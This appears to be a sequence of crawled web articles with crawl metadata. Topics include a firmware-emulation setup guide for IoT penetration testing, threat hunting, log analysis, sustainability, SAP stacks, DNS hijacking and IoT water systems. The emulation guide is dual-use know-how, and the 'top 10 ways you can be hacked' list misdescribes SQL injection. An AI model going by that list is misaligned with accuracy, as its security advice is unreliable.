Once it is done, the next step is to install the remaining depencies for Firmadyne to function properly:
sudo -H pip install git+https://github.com/ahupp/python-magic sudo -H pip install git+https://github.com/sviehb/jefferson sudo apt-get install qemu-system-arm qemu-system-mips qemu-system-x86 qemu-utils
Also set up a PostgreSQL database at this point following the instructions from the official Firmadyne wiki:
sudo apt-get install postgresql sudo -u postgres createuser -P firmadyne sudo -u postgres createdb -O firmadyne firmware sudo -u postgres psql -d firmware < ./firmadyne/database/schema
The password for the database when prompted should be
firmadyne (to avoid any later issues).
That is all for the setup of Firmadyne.
Set up Firmware Analysis Toolkit
The first thing that we will do is move the
reset.py to inside
Once that is done, open up
fat.py and modify the
root password (so that it won't ask you for password while running the script) and specify the path of firmadyne as shown below.
That's all for the setup. Make sure that your postgresql database is up and running
.. and we are good to go.
Emulating a firmware image
All you need to do in order to now emulate a firmware is run
./fat.py and specify the firmware name. In this case, we are running the WNAP320.zip firmware, so we will specify that.
Brand, you can specify any brand, as that is used for purely database purposes.
Your output should be as shown below:
Once it has completed the initial setup process for the firmware, it will provide you with an IP address. In case the firmware runs a web server, you should be able to access the web interface, as well as interact with the firmware over SSH and perform additional network based exploitation.
Let's now open up Firefox and see if we are able to access the web interface.
Congratulations!!! - we have successfully emulated a firmware (which was originally meant for MIPS Big Endian architecture) and even have the web server from within the firmware accessible!
That is all for this blog post. For any further queries, feel free to reach out to us using our contact page .
IoT Penetration Testing and Exploitation training
You can also now sign up for one of our public training bootcamps where you can learn all about IoT Exploitation (Embedded, Firmware, Radio, BLE, ZigBee, Binary etc.) - https://www.attify-store.com/collections/real-world-training/products/offensive-iot-exploitation-live-training | <urn:uuid:6c2b4197-de82-4644-9e4e-def1becd5657> | CC-MAIN-2022-40 | https://blog.attify.com/getting-started-with-firmware-emulation/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338280.51/warc/CC-MAIN-20221007210452-20221008000452-00094.warc.gz | en | 0.853141 | 1,205 | 2.515625 | 3 |
What is Proactive Threat Hunting?Threat hunting is designed to identify unknown threats within an organization’s systems. Unlike reactive cybersecurity methods, which involve responding to a known threat or attack, threat hunting is based on a hypothesis regarding a threat that the organization might be facing. Many organizations have a security strategy focused on detecting and preventing cyberattacks, but this isn’t enough for security. Threat hunting enables an organization to detect and respond to cyber threats that bypass an organization’s cyber defenses. This is essential for mitigating attacks by advanced cyber threat actors that have experience in evading common defenses. Every organization should engage in threat hunting as part of a defense-in-depth strategy. Proactive security enables an organization to detect missed attacks and can help to inform and improve preventative defenses.
Reactive vs. Proactive Threat Hunting
The tools and techniques used in threat hunting are similar to those used when responding to security incidents. In both cases, cybersecurity analysts perform an in-depth analysis of systems to identify indicators of attack. The main difference between the two processes is the starting point: a known incident vs. a hypothesis about a potential threat.
While proactive and reactive investigations use similar techniques, they also have significant differences. Some major differentiators include:
- Scope of Investigation: When investigating a known attack, the scope of investigation is relatively limited as some links in the attack chain are known and the analyst needs to work forward and backward from there. Threat hunting can include a much wider scope of investigation because it involves looking into a completely unknown potential threat.
- Application of Threat Intelligence: Both reactive and proactive investigations use threat intelligence, but they use this data in different ways. Reactive analysis can use threat intelligence to identify incoming or ongoing threats. In contrast, proactive threat hunting uses threat intelligence to determine which threats that an organization may face and how they can be detected.
- Depth of Investigation: An incident response investigation only needs to go far enough to verify a threat and collect any necessary information for remediation. Threat hunting, on the other hand, needs to prove or disprove a theory, which can be more difficult.
- Duration of Impact: The desired end result of incident response is the removal of a present threat. Threat hunting can not only help with the remediation of past attacks but can also help to close visibility gaps and improve defenses for the future.
Cyber Threat Hunting is a Proactive ApproachDone properly, threat hunting is a proactive approach to security. It is based on testing hypotheses about potential attacks rather than digging into threats that have raised alerts on enterprise security solutions. With the right tools, techniques, and processes – as outlined below -, a threat hunter can identify previously unknown threats within an organization’s IT architecture and close overlooked security holes to help prevent future attacks from occurring.
Proactive Threat Hunting ToolsThreat hunters need different tools and data sources than incident responders because they need to develop their own hypotheses and guide their own investigations. Threat hunters need an investigative portal focused on detecting the TTPs of known threats within an organization’s systems rather than retracing the path of a known intrusion from initial access to final objective.
Build a Threat Hunting HypothesisTo be proactive, threat hunters need to investigate a threat that they don’t already know exists. To do so, threat hunters develop a hypothesis about a potential threat that the organization may be facing based upon threat intelligence and knowledge of the organization’s IT environment. This hypothesis should be defined so that it can be proven or disproven based on the collection and analysis of security data within the company’s environment.
Back Your Hypothesis with EvidenceThe objective of a threat hunt is to prove or disprove the hypothesis, which requires data. Threat hunters may collect data from various platforms and data sources such as system and application logs, security tools, and dark web threat intelligence. All of this data should be aggregated for analysis, and the data sources and collection methods should be documented.
Analyze Your Collected DataAfter the necessary data has been collected, threat hunters can analyze it to prove or disprove their hypothesis. This could involve the development of new data analytics which can later be incorporated into defensive tools to provide visibility into this threat in the future. Proving or disproving a hypothesis may require multiple rounds of data collection and analysis if the original data set does not provide a definitive answer.
Document the HuntDocumentation is a key step in the threat hunting process. A threat hunt is an in-depth investigation of a potential threat, including data collection, the development of analytics to identify potential threats from this data, and proving or disproving that hypothesis. By documenting this process, a threat hunter provides a reference for the future. This not only helps to avoid duplicated effort but also makes it easier to repeat or improve on the process in the future.
The Bottom Line
Threat hunting is a vital, proactive component of a corporate cybersecurity strategy. It complements traditional, reactive cyber defense by enabling security analysts to seek out and remediate previously unknown vulnerabilities and intrusions into their environments.
A purely reactive cybersecurity strategy means that a company is always playing catch-up and providing attackers with a window to work toward their objectives and cause harm to the organization before threats are detected and remediated. As cyber threats become more sophisticated and automated, detecting them and remediating them will only become more difficult.
Threat hunting provides an organization with the ability to respond to cyberattacks that went undetected by existing defenses. By performing threat hunts, security analysts can not only remediate overlooked attacks but also develop methods for closing security visibility gaps, improving existing defenses and pursuing adversaries. Threat hunting not only helps to mitigate past and present attacks but also provides a path to improve security for the future.
More Useful Resources
Threat Hunting Guide: How To Protect Critical Assets Through Systematic, Proactive Threat Intelligence
3 Steps To Take Before Executing A Cyber Threat Hunt
How should you go about planning a cyber threat hunt? It comes down to three steps. By investing in each of these planning steps up front, your team can prepare itself both to execute the threat hunt relatively quickly and to ensure that the threat hunt answers your most urgent questions. Here’s a look at how to conduct those three steps of the planning process. | <urn:uuid:24eb2f53-da6e-4902-a37a-f57dfb66a314> | CC-MAIN-2022-40 | https://www.cybersixgill.com/resources/education/threat-hunting-explained/cyber-hunt-with-proactive-threat-intelligence/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030331677.90/warc/CC-MAIN-20220924151538-20220924181538-00295.warc.gz | en | 0.938128 | 1,289 | 2.59375 | 3 |
Log analysis is the process of reviewing computer-generated event logs to proactively identify bugs, security threats or other risks. Log analysis can also be used more broadly to ensure compliance with regulations or review user behavior.
A log is a comprehensive file that captures activity within the operating system, software applications or devices. The log file automatically documents any information designated by the system administrators, including: messages, error reports, file requests, file transfers and sign-in/out requests. The activity is also timestamped, which helps IT professionals and developers establish an audit trail in the event of a system failure, breach or other outlying event.
Why is log analysis important?
In many cases, log analysis is a matter of law. Organizations must adhere to specific regulations that dictate how data is archived and analyzed.
Beyond regulatory compliance, log analysis, when done effectively, can unlock many benefits for the business. These include:
Organizations that regularly review and analyze logs are typically able to identify errors more quickly. With an advanced log analysis tool, the business may even be possible to pinpoint problems before they occur, which greatly reduces the time and cost of remediation.
The log also helps the log analyzer review the events leading up to the error, which may make the issue easier to troubleshoot, as well as prevent in the future.
Effective log analysis dramatically strengthens the organization’s cybersecurity capabilities. Regular review and analysis of logs helps organizations more quickly detect anomalies, contain threats and prioritize responses.
Improved customer experience
Log analysis helps businesses ensure that all customer-facing applications and tools are fully operational and secure. The consistent and proactive review of log events helps the organization quickly identify disruptions or even prevent such issues—improving satisfaction and reducing turnover.
How is log analysis performed?
Log analysis is typically done within a Log Management System, a software solution that gathers, sorts and stores log data and event logs from a variety of sources.
Log management platform allows the IT team and security professionals to establish a single point from which to access all relevant endpoint, network and application data. Typically, this log file is fully indexed and searchable, which means the log analyzer can easily access the data they need to make decisions about network health, resource allocation or security.
Activity typically includes:
Ingestion: Installing a log collector to gather data from a variety of sources, including the OS, applications, servers, hosts and each endpoint, across the network infrastructure.
Centralization: Aggregating all log data in a single location as well as a standardized format regardless of the log source. This helps simplify the analysis process and increase the speed at which data can be applied throughout the business.
Search and analysis: Leveraging a combination of AI/ML-enabled log analytics and human resources to review and analyze known errors, suspicious activity or other anomalies within the system. Given the vast amount of data available within the log, it is important to automate as much of the log file analysis process as possible. It is also recommended to create a graphical representation of data, through knowledge graphing or other technique, to help the IT team visualize each log entry, its timing and interrelations.
Monitoring and alerts: The log management system should leverage advanced log analytics to continuously monitor the log for any log event that requires attention or human intervention. The system can be programed to automatically issue alerts when certain events take place or certain conditions are not met.
Reporting: Finally, the LMS should provide a streamlined report of all events as well as an intuitive interface that the log analyzer can leverage to get additional information from the log.
The limitations of indexing
Many log management software solutions rely on indexing to organize the log. While this was considered an effective solution in the past, indexing can be a very computationally-expensive activity, causing latency between data entering a system and then being included in search results and visualizations. As the speed at which data is produced and consumed increases, this is a limitation that could have devastating consequences for organizations that need real-time insight into system performance and events.
Further, with index-based solutions, search patterns are also defined based on what was indexed. This is another critical limitation, particularly when an investigation is needed and the available data can’t be searched because it wasn’t properly indexed.
Leading solutions offering free-text search, which allows the IT team to search any field in any log. This capability helps to improve the speed at which the team can work without compromising performance.
Log analysis methods
Given the massive amount of data being created in today’s digital world, it has become impossible for IT professionals to manually manage and analyze logs across a sprawling tech environment. As such, they require an advanced log management system and techniques that automate key aspects of the data collection, formatting and analysis processes.
These techniques include:
Normalization is a data management technique that ensures all data and attributes, such as IP addresses and timestamps, within the transaction log are formatted in a consistent way.
Pattern recognition refers to filtering events based on a pattern book in order to separate routine events from anomalies.
Classification and tagging
Classification and tagging is the process of tagging events with key words and classifying them by group so that similar or related events can be reviewed together.
Correlation analysis is a technique that gathers log data from several different sources and reviews the information as a whole using log analytics.
Artificial ignorance refers to the active disregard for entries that are not material to system health or performance.
Log analysis use case examples
Effective log analysis has use cases across the enterprise. Some of the most useful applications include:
Development and DevOps
Log analysis tools and log analysis software are invaluable to DevOps teams, as they require comprehensive observability to see and address problems across the infrastructure. Further, because developers are creating code for increasingly-complex environments, they need to understand how code impacts the production environment after deployment.
An advanced log analysis tool will help developers and DevOps organizations easily aggregate data from any source to gain instant visibility into their entire system. This allows the team to identify and address concerns, as well as seek deeper information.
Security, SecOps, and Compliance
Log analysis increases visibility, which grants cybersecurity, SecOps, and compliance teams continuous insights needed for immediate actions and data-driven responses. This in turn helps strengthen the performance across systems, prevent infrastructure breakdowns, protect against attacks and ensure compliance with complex regulations.
Advanced technology also allows the cybersecurity team to automate much of the log file analysis process and set up detailed alerts based on suspicious activity, thresholds or logging rules. This allows the organization to allocate limited resources more effectively and enable human threat hunters to remain hyper-focused on critical activity.
Information Technology and ITOps
Visibility is also important to IT and ITOps teams as they require a comprehensive view across the enterprise in order to identify and address concerns or vulnerabilities.
For example, one of the most common use cases for log analysis is in troubleshooting application errors or system failures. An effective log analysis tool allows the IT team to access large amounts of data to proactively identify performance issues and prevent interruptions.
Log Everything, Answer Anything – For Free
Falcon LogScale Community Edition (previously Humio) offers a free modern log management platform for the cloud. Leverage streaming data ingestion to achieve instant visibility across distributed systems and prevent and resolve incidents.
Falcon LogScale Community Edition, available instantly at no cost, includes the following:
- Ingest up to 16GB per day
- 7-day retention
- No credit card required
- Ongoing access with no trial period
- Index-free logging, real-time alerts and live dashboards
- Access our marketplace and packages, including guides to build new packages
- Learn and collaborate with an active community | <urn:uuid:0d7e3d89-d3fb-4135-882a-0dbcdf6f3b1e> | CC-MAIN-2022-40 | https://www.crowdstrike.com/cybersecurity-101/observability/log-analysis/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335257.60/warc/CC-MAIN-20220928145118-20220928175118-00295.warc.gz | en | 0.925099 | 1,630 | 3.109375 | 3 |
Previous decades have seen businesses taking less interest in sustainability. But today, many more organizations are integrating their corporate social responsibility into every aspect of the company’s sustainable strategy.
But what do sustainable business strategies aim to achieve? Why are they important? And what benefits do they have to the business and the environment? We will answer all these questions to discover how to build a sustainable business strategy. We will begin with a definition.
What Is A Sustainable Business Strategy?
Business models today incorporate more responsibility than ever before. Beyond profits, more prominent and small organizations are attempting to use sustainable business practices for environmental and social responsibility to the planet and employees.
A sustainable business strategy interweaves environmental, social, and economic considerations into an organization’s practices, policies, and processes. This strategy ensures long-term value for the company and the employees it is composed of by protecting and sustaining natural resources, working toward an output of net zero emissions.
The Value Of Sustainable Business Practices
Environmental and social issues can seem at odds with business, as generating maximum profits is sometimes challenging with ethics as the focus. However, being mindful of social issues ensures high employee experience levels and team cohesion. Taking part in awareness-raising projects for environmental problems can also be used as a team-building exercise that improves employee productivity and gives a competitive advantage.
A recent Gartner study found that customer engagement is at the heart of corporate incentives to engage with sustainability issues. Gartner found that in 2020 63% of sustainable companies felt that customers were their most powerful reason for sustainability actions. As a result of this sustainability drive, 92% of organizations in the study said they are increasing spending on sustainability as part of their company strategy.
Why Sustainable Business Strategies Are Important
Business has a huge impact on the environment and many social implications. Sustainability initiatives to reach zero emissions, such as solar panels or glass, help achieve a company’s commitment to preserving the environment. But renewable energy efficiency doesn’t just save the environment; it also reduces the operational costs of organizational infrastructure.
Advertising long-term sustainability targets to tackle climate change and taking a stand on this issue enhances a company’s image. Customers are at the heart of all business practices, so a sustainable business strategy can help ensure existing customers keep returning and new customers feel a sustainable company is attractive to them and use their services.
The Benefits of Launching A Sustainable Business Strategy
The benefits of using a sustainable business strategy are multi-faceted. The first of these benefits involves building communities. These benefits affect employees, the organization, and many environmental and social factors of the planet we share.
Sustainable business strategies can help nurture positive internal communities and make links with existing external ones. Efforts to conserve the environment and work toward addressing social inequalities can help large enterprises form relationships with charities, boosting morale and improving their image.
Such partnerships with altruistic agencies can create a sustainable and vibrant work culture within an environment that is:
- Lively and inclusive for everyone.
- A place where employees and customers feel safe.
- Carbon emissions neutral.
- Where staff and customer disadvantages are supported.
- Where vulnerable people are empowered and protected.
- Where people feel proud to work.
This vision of a sustainable business is positive for the environment, employees, and customers. Such a culture also improves financial performance.
2. Improve Financial Performance
It is an easy argument to suggest that any sustainability strategy will reduce profits as it is not focused on increasing revenue. However, this is not the case. Sustainable business strategies lead to streamlined processes as part of strategic planning. Waste management increases financial waste reduction as part of a culture of turning off lights and not printing off documents unless it is essential.
These actions have a knock-on effect from an environmental and a business perspective. Key stakeholders feel proud of a company when it is reaching sustainability goals. And this translates into investments, increasing shareholder value chain, and boosting business value.
There is also a competitive advantage when businesses operate this way, as higher investment improves company image and confidence within the market.
3. Enhance Company Culture
Business leaders often emphasize the environmental aspects of a sustainability strategy and forget that they also need to include social factors. A positive company culture supports and empowers more vulnerable or differently-abled employees and educates all employees on a variety of social needs. All employees are equipped with the knowledge to support and empower differently-abled customers, improving customer satisfaction.
Orienting company culture toward environmental issues also helps them comply with government regulations. These are legal obligations designed to protect a state’s environmental and social fabric. By voluntarily incorporating a sustainability strategy into a company’s culture, employees will already have received training in achieving environmental government regulations as part of strategic planning.
Sustainable strategies can also improve employee well-being, leading to improved employee retention.
4. Protect The Environment
Sustainability issues’ number one concern is to protect the environment, no matter what positive implications this might have for a business. Companies can use new technologies to engage in sustainability activities, such as providing lightning-fast Electric Vehicle (EV) charging points charged by solar panels on company buildings.
Other ways to protect the environment with sustainable business strategies are renewably powered delivery robots to cut CO2 and replacing harmful plastics like Styrofoam with sustainable packaging. Companies can also improve energy efficiency by enrolling in Energy as a Service (EaaS) programs which support the installation of renewable energy sources and only charge for energy on units used, rather than a rolling monthly amount.
These initiatives can help reduce environmental degradation as part of sustainable practices.
5 Key Steps To Planning A Sustainable Business Strategy
Sustainable business strategies are significant undertakings requiring detailed planning and ongoing review to achieve goals. The first step is to create goals that staff can easily action.
- Implement Actionable Goals
At the core of successful sustainability strategies are actionable goals. Achieving this involves asking what resources a company has, what they want to achieve, and the time to complete it. If organizations do not fulfill plans, they can be reviewed and rewritten. But without actionable goals in the first place, a sustainable business strategy will have no direction and will not succeed.
- Assess For Operational Weaknesses
An excellent place to begin when planning a sustainable business strategy is to identify operational weaknesses in your business. How much water is wasted by employees when they use the restroom? What food packaging does the office cafeteria use, and could catering staff take steps to replace this with an eco-friendly alternative? Could solar panels allow the entire office building to be self-sufficient for electricity usage?
Assessing these weaknesses creates a foundation for understanding what the organization can do to reduce the impact on the environment and the operation costs of a company’s infrastructure.
- Leverage Executive and Employee Support
Successful sustainable strategies have the support of high-level executives and all employees. Companies face an uphill battle without executive support to change the culture toward sustainable outcomes.
Presenting the business case for sustainable business strategies to executives using visualization and sustainability reports is an effective way of accomplishing this. When executives understand the benefits of sustainable business strategies and how they can begin creating long-term value for external stakeholders, company culture can change from the top down.
- Ensure Organizational Transparency
Reputational risks exist when customers feel that a company is engaging in a sustainable business strategy for the wrong reasons. PR and reputation improvement alone are not reasons for sustainable business strategies. Publishing monthly or annual sustainability reports and consumption patterns show the public that a company is delivering on its promise to be sustainable with a positive environmental impact.
- Communicate The Value and Benefits of The Strategy
Maintaining the momentum of sustainable business strategies can be challenging as enthusiasm can taper off with time. Communicating the value and benefits of sustainability practices should be an ongoing HR and PR collaboration to ensure that employees and customers are aware that the strategy is for life, not just a temporary measure for short-term gain.
Putting Sustainable Business Models Into Action
Sustainable business models depend on changes in culture. It is essential to ensure that executives fully understand the values, objectives and what part the sustainable business model plays in the company’s vision before implementing it.
Every organization operates differently depending on size and type, influencing operations and processes. Companies must carry out sustainable business models like successful business models in the past. Learn from past successes and incorporate sustainability practices into the model in the same way you would any other values-based business model.
Companies can use five steps to ensure sustainable business practice success:
- Step 1: Roll out the plan and create and communicate new practices and policies.
- Step 2: Utilise a sustainability measuring tool service to measure your sustainability level.
- Step 3: Analyse sustainable business strategy results against benchmarks.
- Step 4: Praise staff and communicate achievements.
- Step 5: Become sustainability certified or continue to review the strategy.
Following these steps ensures a structured approach to actioning a sustainable business strategy.
Building Sustainable Strategies That Last
Other factors to consider to increase your chances of success in your sustainable business strategy. The first of these involves new technology adoption.
1. Adopt New Technologies
As in every other aspect of business, innovation in sustainability means technology adoption.
New technologies to improve business sustainability include:-
- Electric and public transport.
- LED lighting.
- Carbon capture and storage technology.
- Solar power.
But it’s not just the purchase of new technology that affects sustainability. Electronic waste (E-waste) is one of the most effective forms of poor sustainability practices in business. This waste comes from older, inactive technologies that IT teams replace with newer versions. IT departments can recycle obsolete equipment for components. So it is important not only what new technologies are adopted but also how companies dispose of the old devices.
Technology adoption involves constant research to be aware of how to continue to grow.
2. Identify and Capture Opportunities For Growth
The core of growth and strategic opportunities is research. CIOs must continuously research new technologies for sustainability. And companies can hire an external sustainability consultant to ensure that sustainability practices are planned, implemented, and maintained within a robust strategy.
3. Deploy Financial Risk Assessments
Financial risk is one of the predominant hesitations that prevent companies from engaging in a sustainable business strategy. Finance teams must carry out comprehensive risk assessments to ensure that every aspect of a sustainable business strategy is costed and clear deliverables can be recorded by staff using metrics. CIOs can collaborate with CFOs to provide the best analytics drawn from risk assessments to optimize any sustainability strategy.
Planning For Tomorrow
Sustainability is the motto for corporate transparency, ethics, and forward-thinking. All companies of any size must consider a sustainable strategy to align with consumer trends and expectations. But beyond this self-interested business case is the outward-facing attitude toward the future, ensuring a brighter, greener tomorrow for the benefit of employees, shareholders, and customers. | <urn:uuid:70867b2e-ceb4-48d4-ba1e-2c684a246989> | CC-MAIN-2022-40 | https://www.digital-adoption.com/sustainable-business-strategy/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335257.60/warc/CC-MAIN-20220928145118-20220928175118-00295.warc.gz | en | 0.926212 | 2,275 | 2.796875 | 3 |
Paying attention to how you use the internet, and putting some simple safeguards in place, can help prevent most of these top 10 ways you can be hacked.
10. Stolen Credentials
Don’t use the same password for all of your online accounts. I know this is a pain, so how about using the name of the company that you are logging into … with your same password.
If my favorite password is “TonyRocks,” I could use:
At Amazon: “AmazonTonyRocks”
At Gmail: “GmailTonyRocks”
At Wells Fargo: “WellsfargoTonyRocks”.
This way to can use your favorite password and, at the same time, be using a different password for all of your accounts!
9. Phishing, The Ultimate Human Error
A general phishing campaign, that uses only 10 messages, has a better than 90 percent chance of getting a click, according to phishing defense vendor, ThreatSim. What does this mean? DON’T CLICK ON THINGS if you do not know what they are.
8. Back-Door Access
Once a cybercriminal establishes a foothold, a back door helps them maintain remote access to an infected system. They remain stealthy, while often uploading more Malware, or creeping to systems containing more sensitive data. Nothing is free on the internet. When you download a game, music, a program, or whatever you are downloading, you must know that something else might be coming in and getting installed on your computer.
Spyware attempts to steal user credentials. It is associated with keyloggers, that can record keystrokes or take a screenshot of the victim’s monitor. Again, nothing is free, so be careful when downloading anything from the internet.
6. Capture Stored Data
BlackPOS, a memory scraping Malware that was used in the massive Target breach, successfully vacuumed up data that had been temporarily stored in clear text, in point-of-sale system memory. Again, nothing is free, so be careful when downloading anything from the internet.
5. SQL Injection
SQL injection is a common and longstanding technique used in web application attacks, and commonly used because they’re widely available automated tools that can detect and attack them, said security experts. Be careful where you go when online. Adult sites are the worst but free software sites can be just as bad. DO NOT USE INTERNET EXPLORER when going to suspicious sites.
4. Brute-Force Attacks
Weak and default passwords are a favorite target of criminals that use brute-force attacks, to pry their way into systems. Always use different passwords and make them good ones. Use upper and lower case letters, numbers, and symbols.
Rootkits are Malware packages that establish a foothold, and enable an attacker to gain complete control of an infected system. Rootkits are associated with getting into the underlying operating system processes, making them difficult to detect. These are very hard to remove. Again, nothing is free, so be careful when downloading anything from the internet.
In the Verizon report, tampering refers to gaining physical access to an automated teller machine or a gas pump terminal, to install a skimming device that reads data from credit card swipes. This is not for a regular computer, but still, be careful what you download.
1. Privilege Abuse
Privilege abuse happens when an employee, or trusted partner, takes advantage of system access privileges that they are granted, and uses them to simply view files or conduct data theft, according to Verizon. The report said that, of all the insider misuse security incidents it analyzed, 88 percent involved some form of privilege abuse. Always keep network files locked up. If you need help with this, Frankenstein Computers is happy to be of service. | <urn:uuid:627b430b-ea89-416c-9d0d-2cbae8651c21> | CC-MAIN-2022-40 | https://www.fcnaustin.com/top-10-ways-can-hacked/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335257.60/warc/CC-MAIN-20220928145118-20220928175118-00295.warc.gz | en | 0.907495 | 826 | 2.734375 | 3 |
In this SAP BASIS tutorial, we will discuss stacks of SAP systems. You will learn about three types of application stacks that are used in SAP software. SAP system is divided into three different types according to which stack it uses. The explanation about these stacks is below.
ABAP SAP System (ABAP Stacks)
A complete infrastructure, in which ABAP-based applications can be developed and used. ABAP system develop using ABAP programming language.
Example: SAP ERP.
Java SAP System (Java Stack)
A complete infrastructure for running J2EE applications.
Example: SAP Enterprise Portal.
ABAP and Java SAP System (Dual Stack)
Offers both ABAP and JAVA technologies in one system or database but with two different database schema.
Example: SAP Solution Manager 7.1.
Did you like this tutorial? Have any questions or comments? We would love to hear your feedback in the comments section below. It’d be a big help for us, and hopefully it’s something we can address for you in improvement of our free SAP BASIS tutorials.
Go to next lesson: SAP Message Server and Dispatcher
Go to previous lesson: SAP Application Server Instances
Go to overview of the course: Free SAP BASIS Training | <urn:uuid:ea8d7085-24fb-4b6c-a02a-f4ea66ce715a> | CC-MAIN-2022-40 | https://erproof.com/basis/free-training/sap-abap-and-java-stacks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335396.92/warc/CC-MAIN-20220929225326-20220930015326-00295.warc.gz | en | 0.866634 | 272 | 2.90625 | 3 |
The Problem: So the story goes that in December of 1955, an officer of the United States Air Force receives a call on a classified hotline phone at a secure location. This number is to be used only in cases of extreme emergency, so he fears the worst when picking it up. On the other end of the phone, a tiny voice asks “Is this Santa Claus?”. The officer was understandably confused, but before long they were overwhelmed by calls from people attempting to call the north pole. The cause of this was a Sears Roebuck ad asking people to call Santa directly and listed a number. However, due to a printing error, the number that was listed was not the one to contact a sales person for Sears, but a commanding officer at NORAD- the North American Aerospace Defense Command. So instead of receiving an order from the White House, they were getting calls from children asking if they were elves.
“DNS Hijacking” is the act of redirecting traffic from its intended destination by way of changing where a particular URL points to (as in the recent case of Lenovo). DNS (Domain Name System) is essentially the Internet’s phone book: It is a massive, massive list of records- each containing a human friendly domain name such as “www.amazon.com” and the IP (Internet Protocol) address that they correspond with like “126.96.36.199”. When IP addresses change, such as going from one location to another, the DNS records can be updated so that from the user’s perspective when they type in the URL nothing has changed. So in our example, the DNS record is the advertisement, the URL ‘Santa’, and the IP address the mistyped phone number.
The Solution: DNS Hijacking is a function that can be done at a number of different levels- either at the user level by way of malware on the affected system, all the way up to poisoning the DNS server itself that the user is performing a look-up against. This is done for a number of different reasons- sometimes for direct payments in a style similar to ransomware, other times for advertising revenue, or for malware distribution. We will be looking at defending against this type of attack at a lower level.
Solution the First: Contact your ISP
ISP’s recently have begun using DNS lookups to inject their own ads and error pages directly into user’s web browsers- resulting in potential privacy, security and censorship issues. Most ISP’s that perform this action provide a method to ‘opt-out’ of this type of modification, and the method of doing so varies from provider to provider- either through a web form or through a phone call. There are however some hostile providers that believe that if you do not want to be tracked, that you should not use their DNS servers which leads us to our next solution.
Solution the Second: OpenDNS
OpenDNS offers the use of their DNS servers free of charge for public use, which can used on any internet-connected device. They also support the use of DNS Encryption- protecting lookups from end to end. If you start to run into problems with your ISP’s DNS servers- whether that is downtime or issues with what they are directing you to, this is an excellent alternative to consider.
Solution the Third: Malware Defenses
Spybot and MalwareBytes are exceptionally good anti-malware utilities that have free versions available for home use. If you begin seeing unusual activity when you try to logon to sites such as www.google.com, you may have malware installed on your computer which is redirecting your request to a different web server. Both products are excellent overall security tools, and are capable of protecting your HOSTS file– a hard-coded lookup method that pre-dates DNS, but is still in use for most computers.
DNS Hijacking is one of the few types of attacks that scales to an incredible degree depending on the skill of the attacker: from a single system, to the 13 root DNS Servers of the Internet. It is also a method that many otherwise legitimate organizations feel that they can use to help line their pockets by redirecting bad look-ups to their own websites. Regardless of the intent, it is still changing traffic from where it needs to go and needs to be prevented wherever possible. | <urn:uuid:41d3e458-a787-44d0-97f9-8026198e8e2c> | CC-MAIN-2022-40 | https://www.lifars.com/2015/03/weird-security-term-of-the-week-dns-hijacking/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335396.92/warc/CC-MAIN-20220929225326-20220930015326-00295.warc.gz | en | 0.952565 | 910 | 2.859375 | 3 |
Given today’s leading technology story on BBC News highlighting why alarm bells are ringing over Computing in England’s schools, with the British Computing Society warning that the number of pupils studying for a computing qualification could halve by 2020, IT security experts from Mindtree and Thales e-Security commented below.
Guita Blake, Senior VP & Head of Europe at Mindtree:
“In the midst of the fourth industrial revolution, these statistics highlight the need for a significantly greater commitment to the ‘STEM agenda’ in the UK.
Inspiring the next generation of computer experts is critical for both the future of the IT industry, and the UK economy more broadly.
“The UK education system now needs to focus on inspiring the youth of today to equip themselves with the necessary skills that will enable them to thrive in the digital economy.”
Peter Carlisle, VP EMEA at Thales e-Security:
“With cyber-attacks increasing, a decline in young people taking computer science courses in unacceptable, especially when businesses are so desperate for specialist skills and support.
“To reverse this trend, industry must do more to provide training and work experience to help encourage the next generation to pursue a career in IT, which is now the frontline against hackers.” | <urn:uuid:86c7b39f-dc9c-4998-944d-956c3ece6392> | CC-MAIN-2022-40 | https://informationsecuritybuzz.com/expert-comments/computing-schools-alarm-bells-englands-classes/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335573.50/warc/CC-MAIN-20221001070422-20221001100422-00295.warc.gz | en | 0.911687 | 267 | 2.609375 | 3 |
IoT Facilitates Enhancements to Water Management Systems
Work in IT long enough, and you'll know that when people talk about “the next big thing,” they’re never thinking big enough, or small enough. Over the last 30 years, every successful wave of innovation has been based on what already exists. From cell phones and computers, to the Internet itself, all successful technologies have been rapid, and incremental, expansions of existing small ideas into world spanning technology platforms. There are amazing things you can do with your network if you can feed information back into your processes, measure it and leverage the data to remotely monitor and respond to situations quickly. Even though Rain for Rent is an 80 year old brick and mortar company, we believe that the only way to stay relevant today is to continuously improve and prudently adopt new technology as it becomes available.
Our latest "next big thing" has been focused on machine-to-machine communication (M2M): devices talking to like devices. Machines are things that perform actions for us, and we'd like for them to be a bit more self-directed, or "smart". What makes machines “smart,” are the sensors, the small things that make all of this possible by measuring, evaluating, and transmitting data. The Internet of Things (IoT) really comes together with the connection of those sensors and a "brain" to the machines that perform work. Historically, that brain has been a human one, looking at water levels, temperatures, weather, etc.
By instrumenting our world, we can measure and control that world. Sensors have existed for millennia, from the most basic, "look the river is rising" idea to smart home technology that can tell your sprinklers to turn off if it's raining. What the IoT enables is extending these sensors to all aspects of our lives, and then giving these sensors parameters that allow them to control the world for us via a computer.
What the IoT enables is extending sensors to all aspects of our lives, and then giving these sensors parameters that allow them to control the world for us via a computer
Currently, we have a very large water and power project out in the desert and all of our field tanks have remote monitoring capabilities that save the customer a significant amount of time, but with more network connectively comes more potential for intrusion. As we deploy our technologies to customers, we have also implemented multiple layers of protection.
Let’s look at an example. The water source for the City of Rome, NY was at risk because of a disintegrating concrete pipeline. In order to repair the pipeline, the contractor needed a bypass system with the pipeline traversing seven miles of densely wooded hills with significant elevation changes.
Rain for Rent provided a system that handled the flow easily during the repair and our IoT strategy enabled us to run the complex, seven mile long system, virtually unmanned. Typically a job of this size would require almost hourly monitoring and many human touches. We were able to pass the cost savings on to the customer and ensure the water flowed to the town, while minimizing the environmental impact. The customer saved the cost of eight full time employees on the job, but was alsoreassured that the system was bullet proof from both a reliability, and security point of view. We accomplished this by hardwiring the sensor arrays, and using our standard defense in-depth methodology which involves isolating the system from all potential attackers.
